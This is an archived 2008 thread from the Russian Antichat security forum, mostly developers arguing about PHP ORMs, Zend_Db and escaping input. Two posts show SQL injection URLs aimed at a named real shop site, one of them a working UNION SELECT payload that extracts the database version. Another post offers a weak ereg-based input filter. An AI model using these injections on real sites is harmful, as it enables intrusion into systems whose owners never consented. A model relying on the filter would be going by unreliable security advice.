ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.10.2008, 02:00
|
|
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435
Репутация:
2290
|
|
попрубуй поддерживать нагруженый проект с такой фигней в коде
nnm покатит? там ведь чисто plain процедурный подход.
и почему ее желательно не юзать
И почему же?
Я что-то не понял, или кто-то действительно написал, что оно дергает СУБД?
Она работает на клиенте. А требует просто наличие соединения, чтобы знать кодировку.
А нельзя ли действовать по принципу KISS
Так и делают.
Только в некоторых случаях под него даже orm попадает.
|
|
|
27.10.2008, 11:22
|
|
Познающий
Регистрация: 09.10.2006
Сообщений: 92
Провел на форуме:
347686
Репутация:
87
|
|
Принцип KISS. Так и делают.
Только в некоторых случаях под него даже orm попадает.
Насчет kiss посмотри исходники propel или doctrine все ли там понятно. orm не то место где нужно строго придерживаться kiss(если, конечно ты не пишеш свою orm). Подключил и забыл, тебе предоставили только апи, а как оно там работает - забота разработчика orm. Кстати, в zf ниразу нет orm
Сообщение от nerezus
nnm покатит? там ведь чисто plain процедурный подход.
итак, ты поддерживаеш nnm. plain подход? хорошо.
Знаеш поддержка это не только следить чтоб ничего не упало, это еще и добавление новых фичей, туда же рефакторинг и т.д. Удобно смотреть на спагетти в коде? А еще есть DRY. Он ведь рядом с KISS стоит.
зы. я не удивлюсь если ннм работает на одном сервере(не настолько он нагружен) там больше на статику нагрузка, а nginx ее раздаст и даже не моргнет
|
|
|
|
27.10.2008, 12:36
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
http://www.a-store.ru/catalogue/?cat='+union+select+1,2,3/*
почему результат не выводит при написании команд version() и других
|
|
|
|
27.10.2008, 21:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от heks
http://www.a-store.ru/catalogue/?cat='+union+select+1,2,3/*
почему результат не выводит при написании команд version() и других
http://www.a-store.ru/catalogue/?cat='+union+select+1,2,unhex(hex(version()))/*
только тема немного не та
|
|
|
|
27.10.2008, 12:39
|
|
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435
Репутация:
2290
|
|
если, конечно ты не пишеш свою orm
Пишу) Точнее надо оформить в норм вид - phpdoc добавить)
итак, ты поддерживаеш nnm.
Мой знакомый писал ее движок. Год уже он не учавствует в проекте.
Я привел это только как подтверждение, что и так можно делать крупнейшие сайты.
я не удивлюсь если ннм работает на одном сервере
Именно так и было, ща хз. При этом это один из самых посещаемых ресурсов рунета.
Кстати, в zf ниразу нет orm
Zend_Db хватает для полной абстракции. ORM свой. На Zend_Db основан.
|
|
|
|
27.10.2008, 14:34
|
|
Познающий
Регистрация: 09.10.2006
Сообщений: 92
Провел на форуме:
347686
Репутация:
87
|
|
Сообщение от nerezus
Мой знакомый писал ее движок. Год уже он не учавствует в проекте.
Трин? Куда пропал?
Сообщение от nerezus
Zend_Db хватает для полной абстракции. ORM свой. На Zend_Db основан.
Zend_Db штука универсальная и переносимая, но это не более чем фабрика. А вот Zend_Db_* предоставляет полноценный ActiveRecord, кажется лучший что я видел среди всем пхп фрейморков(имхо). Зачем тебе orm? Zend_Db_* много чего умеет
По топику.
http://framework.zend.com/svn/framework/standard/trunk/library/Zend/Db/Adapter/Abstract.php on line ~745
Метод _quote используется как дефолтный эскейпер для всех бэкендов бд. Вот чем я советовал заменить mysql_real_escape_string
|
|
|
|
27.10.2008, 16:49
|
|
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435
Репутация:
2290
|
|
Трин. Неважно)
Зачем тебе orm? Zend_Db_* много чего умеет
Для простоты использования 
|
|
|
|
26.10.2008, 19:26
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
Сообщение от b3
Нужно указывать ТИП переменной а не фильтровать её, как понял я. Хотя в РНР я не силен.
Вот еще способ :
Код:
//Режем слеши
$text = stripslashes($text);
//Режем хтмл
$text = htmlspecialchars($text);
//Убираем символ новой строки
$text = ereg_replace("\n", " ", $text);
//Убираем символ новой строки (windows-формат)
$text = ereg_replace("\r", "", $text);
//Убираем символы открывающие любые тэги
$text = ereg_replace("<", "", $text);
$text = ereg_replace(">", "", $text);
//Убираем символы похожие на сепаратор =)
$text = ereg_replace("::", "", $text);
Твой ерег оборвется на null - байте =\
Лучше уж прегматч использовать
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид